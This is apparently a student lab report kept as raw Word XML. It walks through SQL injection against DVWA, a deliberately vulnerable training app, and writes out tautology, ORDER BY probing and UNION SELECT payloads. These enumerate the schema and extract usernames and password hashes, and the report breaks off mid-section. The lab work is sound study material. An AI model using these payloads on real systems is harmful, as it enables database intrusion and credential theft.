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F32F8" w14:textId="57AD80FE" w:rsidR="00F4343D" w:rsidRPr="00E55BA7" w:rsidRDefault="00F4343D" w:rsidP="00F4343D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:hAnsi="Montserrat"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk161668186"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00E55BA7">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:hAnsi="Montserrat"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">LAB EXPERIMENT – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:hAnsi="Montserrat"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF247B" w14:textId="77777777" w:rsidR="00053866" w:rsidRDefault="00F4343D" w:rsidP="00F4343D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/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t>SQL INJECTION ON DVWA</w:t>
      </w:r>
      <w:r w:rsidR="00053866">
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:hAnsi="Montserrat"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB697DA" w14:textId="44974998" w:rsidR="00D47B6A" w:rsidRPr="00F4343D" w:rsidRDefault="00053866" w:rsidP="00F4343D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="0" w:line="240" w:lineRule="auto"/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t>(John the Ripper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29420396" w14:textId="77777777" w:rsidR="00D47B6A" w:rsidRDefault="00D47B6A"/>
    <w:p w14:paraId="13ABEAF8" w14:textId="66FBA67E" w:rsidR="00D47B6A" w:rsidRPr="00D47B6A" w:rsidRDefault="00D47B6A" w:rsidP="00D47B6A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D47B6A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>COMMAND EXECUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF0051" w14:textId="77777777" w:rsidR="00D47B6A" w:rsidRDefault="00D47B6A"/>
    <w:p w14:paraId="406D448A" w14:textId="4561D96D" w:rsidR="00E6498B" w:rsidRDefault="00E6498B">
      <w:r w:rsidRPr="00E6498B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D01AF6D" wp14:editId="57F420AA">
            <wp:extent cx="5731510" cy="5500370"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="347980"/>
            <wp:docPr id="80543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323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DCA71D" w14:textId="68207675" w:rsidR="003C577C" w:rsidRDefault="001D1906">
      <w:r w:rsidRPr="001D1906">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B97EFEC" wp14:editId="365B8435">
            <wp:extent cx="5731510" cy="2896235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2323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35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E81" w14:textId="79F4BCBC" w:rsidR="00610C6B" w:rsidRDefault="00610C6B">
      <w:r w:rsidRPr="00610C6B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CF97BCC" wp14:editId="6402DAC1">
            <wp:extent cx="5731510" cy="5647055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20797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C077" w14:textId="77777777" w:rsidR="00756BA0" w:rsidRDefault="00756BA0"/>
    <w:p w14:paraId="0DA9BD4B" w14:textId="59668219" w:rsidR="00756BA0" w:rsidRDefault="00756BA0">
      <w:r w:rsidRPr="00756BA0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C99D1DF" wp14:editId="117FA08B">
            <wp:extent cx="5731510" cy="5355590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50525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55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495B" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="179A0CC5" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="74AA98AA" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="2239BCE4" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="37E26E14" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="6923A3AD" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="34FB6334" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="0DDA64BE" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="4E035F02" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="01758FEE" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="704E5936" w14:textId="77777777" w:rsidR="007A6B6F" w:rsidRDefault="007A6B6F" w:rsidP="007A6B6F"/>
    <w:p w14:paraId="7C95C758" w14:textId="2E711E9B" w:rsidR="007A6B6F" w:rsidRPr="007A6B6F" w:rsidRDefault="007A6B6F" w:rsidP="007A6B6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A6B6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL INJECTION</w:t>
      </w:r>
      <w:r w:rsidR="007E7966">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> (LOW Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F4999" w14:textId="61C57CB7" w:rsidR="00CA051B" w:rsidRPr="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7768A6EA" w14:textId="47C46F6E" w:rsidR="00141F00" w:rsidRDefault="00CA051B" w:rsidP="00141F00">
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795108D0" w14:textId="1A40ECAD" w:rsidR="00141F00" w:rsidRDefault="00141F00" w:rsidP="00141F00">
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0621BE8D" w14:textId="70419FCB" w:rsidR="00141F00" w:rsidRDefault="00141F00" w:rsidP="00141F00">
      <w:r>
        <w:t xml:space="preserve">1' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E95313" w14:textId="7A87F5D9" w:rsidR="00CA051B" w:rsidRDefault="00141F00" w:rsidP="00CA051B">
      <w:r>
        <w:t>' OR 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC754D0" w14:textId="020FE2EA" w:rsidR="00CA051B" w:rsidRDefault="00932EDB" w:rsidP="00CA051B">
      <w:r w:rsidRPr="00932EDB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17A9F95E" wp14:editId="015A76F7">
            <wp:extent cx="5639587" cy="6154009"/>
            <wp:effectExtent l="152400" t="152400" r="342265" b="342265"/>
            <wp:docPr id="21303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30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154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D5D58" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To find the number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D044208" w14:textId="7F52451A" w:rsidR="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:r>
        <w:t>1' order by 1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B3FD2" w14:textId="4D66E454" w:rsidR="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:r>
        <w:t>1' order by 2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC2060" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:r>
        <w:t>1' order by 3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497C340" w14:textId="1231FE71" w:rsidR="00CA051B" w:rsidRDefault="00CA051B">
      <w:r>
        <w:t>This verifies that we had no further columns in our table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D767F" w14:textId="095FDB95" w:rsidR="003C577C" w:rsidRDefault="003C577C">
      <w:r w:rsidRPr="003C577C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D77AB36" wp14:editId="41C334CC">
            <wp:extent cx="5731510" cy="2860675"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="339725"/>
            <wp:docPr id="42438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82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9C29B" w14:textId="191B9558" w:rsidR="00141F00" w:rsidRDefault="003C577C">
      <w:r w:rsidRPr="003C577C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63629260" wp14:editId="78CD4530">
            <wp:extent cx="5496692" cy="1629002"/>
            <wp:effectExtent l="152400" t="152400" r="351790" b="352425"/>
            <wp:docPr id="119037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73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D50D7" w14:textId="5E75E6F2" w:rsidR="0097152C" w:rsidRDefault="003C577C">
      <w:r w:rsidRPr="003C577C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24308121" wp14:editId="57687C50">
            <wp:extent cx="5114926" cy="998483"/>
            <wp:effectExtent l="152400" t="152400" r="333375" b="335280"/>
            <wp:docPr id="184381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7167" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="40775"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5115639" cy="998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9D134" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="2E5AB1D6" w14:textId="27418D63" w:rsidR="00F011FB" w:rsidRDefault="00F011FB">
      <w:r w:rsidRPr="00F011FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BD375B2" wp14:editId="02EBCA47">
            <wp:extent cx="5731510" cy="6588760"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="345440"/>
            <wp:docPr id="69887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79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FA62A" w14:textId="77777777" w:rsidR="0097152C" w:rsidRDefault="0097152C"/>
    <w:p w14:paraId="7E7D080B" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="31D65B05" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="37ED8D5F" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="65E4FAFB" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DA210F" w14:textId="1B835FF6" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00822186">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC43F8" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1' union select user(),database()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558541D" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This shows the username and database name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C4651" w14:textId="26679D0D" w:rsidR="0097152C" w:rsidRDefault="0097152C">
      <w:r w:rsidRPr="0097152C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5897BB17" wp14:editId="2ABBB500">
            <wp:extent cx="5677692" cy="3667637"/>
            <wp:effectExtent l="152400" t="152400" r="342265" b="352425"/>
            <wp:docPr id="53081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11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667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DFF66" w14:textId="77777777" w:rsidR="00822186" w:rsidRDefault="00822186" w:rsidP="00CA051B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D20E289" w14:textId="1A053424" w:rsidR="00CA051B" w:rsidRPr="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319F644F" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0' union select 1,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD7E990" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">This shows the table of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> that is users and guestbook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED1781" w14:textId="77777777" w:rsidR="0097152C" w:rsidRPr="00822186" w:rsidRDefault="0097152C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409D3B52" w14:textId="3C20B5D9" w:rsidR="0097152C" w:rsidRDefault="0097152C">
      <w:r w:rsidRPr="0097152C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2319AA" wp14:editId="00CE784A">
            <wp:extent cx="5731510" cy="1282700"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="336550"/>
            <wp:docPr id="162868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82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9EB8D" w14:textId="36EE3160" w:rsidR="00822186" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00822186">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E594D" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0' union select 1,group_concat(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">' and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>='users'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894AC87" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This shows all the columns of the table which we fetched from the table users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D85500B" w14:textId="77777777" w:rsidR="0097152C" w:rsidRDefault="0097152C"/>
    <w:p w14:paraId="5B4577AD" w14:textId="64CAA769" w:rsidR="0097152C" w:rsidRDefault="0097152C">
      <w:r w:rsidRPr="0097152C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099D70FB" wp14:editId="2BD239D0">
            <wp:extent cx="5731510" cy="1351915"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="343535"/>
            <wp:docPr id="188077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71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D9FFFA" w14:textId="77777777" w:rsidR="0097152C" w:rsidRDefault="0097152C"/>
    <w:p w14:paraId="38E66009" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00CA051B" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0F0FC" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRPr="00822186" w:rsidRDefault="00CA051B" w:rsidP="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">0' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dvwa.users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> limit 0,1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD83001" w14:textId="52D0916B" w:rsidR="0097152C" w:rsidRPr="00822186" w:rsidRDefault="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00822186">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>We got the username and password which is hash encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0322A1" w14:textId="6B2B5947" w:rsidR="0097152C" w:rsidRDefault="0097152C">
      <w:r w:rsidRPr="0097152C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5826D17C" wp14:editId="12E53B4E">
            <wp:extent cx="5731510" cy="1773555"/>
            <wp:effectExtent l="152400" t="152400" r="345440" b="340995"/>
            <wp:docPr id="87852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22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75CA0" w14:textId="77777777" w:rsidR="0097152C" w:rsidRDefault="0097152C"/>
    <w:p w14:paraId="379BF89B" w14:textId="77777777" w:rsidR="0097152C" w:rsidRDefault="0097152C"/>
    <w:p w14:paraId="65FD614F" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="0A0C78CF" w14:textId="77777777" w:rsidR="00822186" w:rsidRDefault="00822186"/>
    <w:p w14:paraId="234B7BD6" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="59FBDCB7" w14:textId="77777777" w:rsidR="00CA051B" w:rsidRDefault="00CA051B"/>
    <w:p w14:paraId="282F70F0" w14:textId="77777777" w:rsidR="0097152C" w:rsidRDefault="0097152C"/>
    <w:p w14:paraId="28E7A18A" w14:textId="19B965FF" w:rsidR="00CA051B" w:rsidRPr="009B7D97" w:rsidRDefault="00CA051B" w:rsidP="009B7D97">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA051B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Commands Used in Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A143075" w14:textId="35BA9104" w:rsidR="00CA051B" w:rsidRDefault="00CA051B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B7D97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
